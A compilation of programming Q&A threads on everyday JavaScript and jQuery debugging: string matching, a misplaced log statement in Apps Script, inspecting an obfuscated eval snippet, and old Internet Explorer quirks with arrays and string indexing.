Why does this script never run? - javascript

I've got the following JavaScript statement, that executes on Page Load:
The variable u1 is populated with one of the following values:
BBSLoan|Accept|PPI+No|60Months
BBSLoan|Refer|PPI+No|60Months
HSBSLoan|Accept|PPI+No|48Months
HSBSLoan|Refer|PPI+No|48Months
I have been informed that the conditions in the conditional statements will never be met - is this true? From what I can see, going on each of the variables, the index that will be returned by indexOf is 0? Unless I am mistaken?
EDIT: Just to clarify, the variable 'u1' will be populated dynamically with any of the 4 strings listed above. The %pu1=!; is actually a macro that will populate this value.
<script language="JavaScript" type="text/javascript">
var u1 = '%pu1=!;';
if (u1.indexOf('BBSLoan|Accept') > -1) {
var pvnPixel = '<img src="http://www.url1.com"/>';
document.writeln(pvnPixel);
}
if (u1.indexOf('BBSLoan|Refer') > -1) {
var pvnPixel2 = '<img src="https://www.url2.com;"/>';
document.writeln(pvnPixel2);
}
if (u1.indexOf('HSBSLoan|Accept') > -1) {
var pvnPixel3 = '<img src="https://www.url3.com;"/>';
document.writeln(pvnPixel3);
}
</script>
Thanks in advance!

This answer is not correct. It will be deleted later, but is being left to prevent this answer from popping up again.
var u1 = '%pu1=!;';
The value of u1 is always '%pu1=!;', since you declare it as that.

Ok I finally got this to work using search instead of indexOf!

Would it make more sense to use a switch statement with a default case, or at a minimum provide an "else" with a default?
Have you tried to put a debugger statement in after var u1 is set, and step through using the client (firefox, chrome, IE, safari all have built in "developer tools" with the ability to step through js code) debugger to see what the value of u1 is?

How do i fix the wrong integration of an automatic transfer of rows between sheets?

What I'm trying to accomplish is:
have a data input sheet called 'data' (its data is fed by a form)
script moves the information from data to sheet1/sheet2/.../sheetn (according to a string that is to be found in column 3)
script also deletes moved rows
I think the deleteRow command works fine, i suspect the culprit being the detection of the string in the array.
I've already used the search a lot, tried a few codes and I've identified this as the most probable candidate (its by cooper), as it's almost doing what i need it to do.
I tried logging a bit, but unfortunately i dont know too much about coding yet. Currently im learning by trial and error.
If i log for vals[i][2] i only get 1 string, instead of a few from my example input.
When i set only one targetsheet (sh1) and target-term it works. but when i extend it it doesnt work anymore.
{
var ss=SpreadsheetApp.getActive();
var sh0=ss.getSheetByName('Data');
var rg0=sh0.getDataRange();
var sh1=ss.getSheetByName('Applesheet');
var sh2=ss.getSheetByName('Banana');
var sh3=ss.getSheetByName('Cherry');
var vals=rg0.getValues();
Logger.log(vals)
for(var i=vals.length-1;i>0;i--)
{
if(vals[i][2]=='Apple')
Logger.log("PV Abfrage -", vals[i][2])
{
sh1.appendRow(vals[i]);
sh0.deleteRow(i+1);
}
if(vals[i][2]=='Banana') //also tried with else if here
{
sh2.appendRow(vals[i]);
sh0.deleteRow(i+1);
}
if(vals[i][2]=='Cherry')
{
sh3.appendRow(vals[i]);
sh0.deleteRow(i+1);
}
}
}
My code moves rows that dont contain any of the terms.
It's also supposed to only move rows that contain this term, but its doing so super unrealiably.
I think all rows get appended to Applesheet, rows that contain banana are moved to banana but the ones with cherry wont.
Im definitely not experienced enough to judge, but this code seems a bit unreliable, because even my test version with just one if fails to perform the way i want it to.
Issue:
Your first if statement is forced to return true by the Logger.log() you've included between if and {. As soon as you remove it, your code functions exactly as you're expecting.
Example:
If we run the following script:
var check = ['Apple', 'Pear', 'Fruit'];
for (i = 0; i < check.length; i++) {
if (check[i] === 'Apple') {
console.log('Found!');
}
}
We're looping through an array, and logging "Found!" for every time the item in the array is found. This is the same way your script works. It works as expected, "Apple" is only found once in the array, so the log looks like this:
Found!
As soon as we put a log between the if and the {, like so:
var check = ['Apple', 'Pear', 'Fruit'];
for (i = 0; i < check.length; i++) {
if (check[i] === 'Apple')
console.log("Oops!")
{
console.log('Found!');
}
}
We get the following:
Oops!
Found!
Found!
Found!
Summary:
Make sure to only include your conditions for the if statement between your if and {, adding anything else can return false positives like you've experienced today.

How can I decode a javascript snippet that is obfuscated with what appears to be a unicode or regex string with an eval() function?

So I came across an interesting piece of javascript that I can't quit figure out. It appears to me at first to be either regex function or a unicode string, that is then passed onto an eval function for processing. I have been trying for quite some time to decode it, but I don't seem to be making any headway. I'm hoping someone might be able to tell me what is going on here, and maybe show me how to decode it.
Edit: So it turns out that the code I posted before was flawed from a previous decoding attempt. This is the corrected code.
$(window).load(function() {
var d = '960';
var d1 = '960';
var q = 'u94';
var uw = $("#u94");

You can see at the second to last line here, we are passing '1m B=["\a\l....' to the function inside the eval. When I first saw this, I thought it was a Regex of some kind that was then converted by the browser as text, but to my knowledge, there isn't a way to convert it back? Looking into this further, I was told that it could all be unicode, but trying to convert the string back into characters has failed in ever converter I have tried. Am I way off base here?
EDIT: See below for update! I exceeded the character limit, lol!
This line var uw = $("#u94"); almost certainly means it's using content from the page itself to do the decoding.
The easiest way I can think of to try to get the code that is actually running is to return to where you found the code and open up your dev tools. Find the code again (I am guessing it's probably dynamically generated) and then without leaving the page copy/paste it into the text editor of your choice and do the following:
1) Change the first line like this
$(window).load(function() { -> (function() {
2) Change the last line like this:
}); -> })() (now you have a self-calling function)
3) Just before the last return add a console.log
The last return is returning the code that eval will actually run so add console.log(_0x4a22x1) before the return (again this exact variable name could be different upon returning to the page)
4) Copy/paste this into your dev tool console and if it worked it should print out the code that it's running.
NOTE: It's entirely possible that once the code runs the first time it removes the element (currently #u94) that contains something you need to run the code (so it could not work). So if it doesn't log the code out, then the first thing I would do it is a normal View page source (or curl the html) and find out what the #u94 element contains and adapt the code as necessary.
Good luck!

What is the initial value of an initialized Array in Javascript on different systems?

I've been struggling for months with a JavaScript problem where I have an array with a few properties, and later some of these properties are checked to decide whether or not to show a message to the user.
Now this all goes well on most systems (especially more recent browsers) but not so much on some of my client's IE7 computers.
Now I just found out that somewhere in my code I initialize a new Array like below, but never actually set the value for 'done'
var qar=new Array('question_no','pos','done');
qar['question_no'] = 1234;
qar['pos'] = 1234; //dont mind these numbers
Later in some for loop I check:
//check if this question was already shown
if(qar['done'])
continue; //stop here, don't show message
//set done to true, so that this question will not be shown again
qar['done'] = true;
window.alert('messaged!');
Again, what goes wrong is that sometimes (actually pretty often, but not always) the message is not shown at all in IE7.
Now for my question to you: I know that qar['done'] should be undefined right after initialization, which makes my code work fine (in Chrome etc), but could it be that somehow in IE7 this situation is handled differently? For example that qar['done'] is not undefined, but some random value and therefore is sometimes considered true accidentally? Or is that a stupid thing to think?
If this is not the problem, then I don't know what is..
Thanks in advance!
By doing this:
var qar=new Array('question_no','pos','done');
You are just creating array with indexes.
qar[0] will be 'question_no'
qar[1] will be 'pos'
qar[2] will be 'done'
in this case, qas['done'] will always be undefined.
Thats why its causing problems. You should either use javascript object instead of using an array.
But you can do something like this:
if(typeof qar['done'] === 'undefined'){
qar['done'] = true;
alert('messaged!');
}
Your code should be like this:
var qar={};
qar['question_no'] = 1234;
qar['pos'] = 1234; //dont mind these numbers
//check if this question was already shown
if(!qar['done']) {
//set done to true, so that this question will not be shown again
qar['done'] = true;
window.alert('messaged!');
}

Javascript/jQuery function yields undefined in <IE8

A short while back I asked a question here about how I could calculate when a heading was longer than one line within a given container, and subsequently wrap each of these lines in a <span>:
Use Javascript/jQuery to determine where a heading breaks to the next line?
I chose an answer which worked great for me, at least until I checked in IE7 and IE6, in which all the headings handled by this script rendered as
"undefinedundefinedundefinedundefinedundefinedundefined[...]"
on the page. As I'm not really a JavaScript person (that's why I asked such a question in the first place), it's really tough for me to figure out where the problem is. I assumed an undefined variable or something, but I just can't seem to grasp it.
Can anyone help?
I'll repeat the code here, but please refer to the link above for context:
$(function(){
$h = $('.fixed').find('h3');
$h.each(function(i,e){
var txt = $(e).text();
$th = $('<h3 />').prependTo($(e).parent());
var lh = $(e).text('X').height();
$(e).text('');
while (txt.length > 0) {
$th.text($th.text() + txt[0]);
txt = txt.slice(1);
if (($th.height() > lh) || (txt.length <= 0)) {
var shc = $th.text().split(' ');
var ph = shc.slice(0,-1).join(' ')+' ';
if (txt.length <= 0) { ph += shc.pop(); }
$('<span />').text(ph).appendTo($(e));
$th.text(shc.pop());
}
}
$th.remove();
})
});
You need to change
$th.text($th.text() + txt[0]);
to be
$th.text($th.text() + txt.charAt(0));
IE<8 doesn't accept string positions through array indexes ;)
The styling doesn't work, but that'll be a CSS issue which I couldn't fix before leaving. But everything is wrapped in spans :)
Nothing jumps out at me. But, since you mentioned in your comment to your question that you see "undefined" in Firebug, I would start there. Even though those browsers are failing gracefully, the fact that you see undefined there is your first hint to finding the problem for the harder-to-diagnose IE6/7. I would use Firebug and either breakpoint in the function, or use some console.log() calls to document what the values that you are working with are each step of the way. Once you start seeing undefined... you have likely found your problem.

If Statements Skipping or Evaluating Strangely, JavaScript and jquery

So in jQuery, I have a global variable "currentSubNav" that stores a current visible element. The following code executes on "mouseenter".
I need it to get store element's ID, check to see if there was one. If there wasn't, set the new visible element to the default.
$('#mainMenu a').mouseenter(function() {
var newName = $(this).attr("id");
if(newName == ''){
var newName = "default";
}
Then it checks to see if the new element matches the current one. If so, it returns. If not, it performs the animations to bring in the new one.
if(newName == currentSubNav){
return;
}else{
$("div[name=" + currentSubNav + "]").animate({"left": "+=600px", "opacity": "toggle"}, "slow");
$("div[name=" + newName + "]").css({"margin-top": "0"});
$("div[name=" + newName + "]").fadeIn(2000);
$("div[name=" + currentSubNav + "]").animate({"left": "-=600px"}, 0);
currentSubNav = newName;
return;
}
});
I'm using Chrome at the moment, and according to the dev tools that isn't what happens.
Problem #1
"$(this).attr("id");" isn't returning undefined as the documentation claims. It seems to be returning "". BUT, when I have the if statement as I do above, it skips over the statement entirely. I set a breakpoint, but it never pauses execuation, so the statement is never evaluated.
Problem #2
After the animations occur, instead of using the return at the end of the statements it goes back and uses the return for the "newName == currentSubNav" if statement. I guess that not a big deal, but it's not the intended behavior.
I'm fairly new to JavaScript, and it appears I'm missing something about how JavaScript works. But I can't find what anywhere. Any help?
EDIT: It seems to be working in FireFox, (though jQuery isn't returning undefined, it is returning ''). So this is a Chrome problem at the moment.
I would change the assignment of "newName" as follows:
var newName = $(this).attr('id') || 'default';
That's more idiomatic, and it'll handle cases where you're getting null instead of an empty string, or vice-versa, and when it doesn't really matter anyway.
I suspect that some of the "problems" you're seeing are more a matter of the Chrome debugger than the actual way that the code is running.
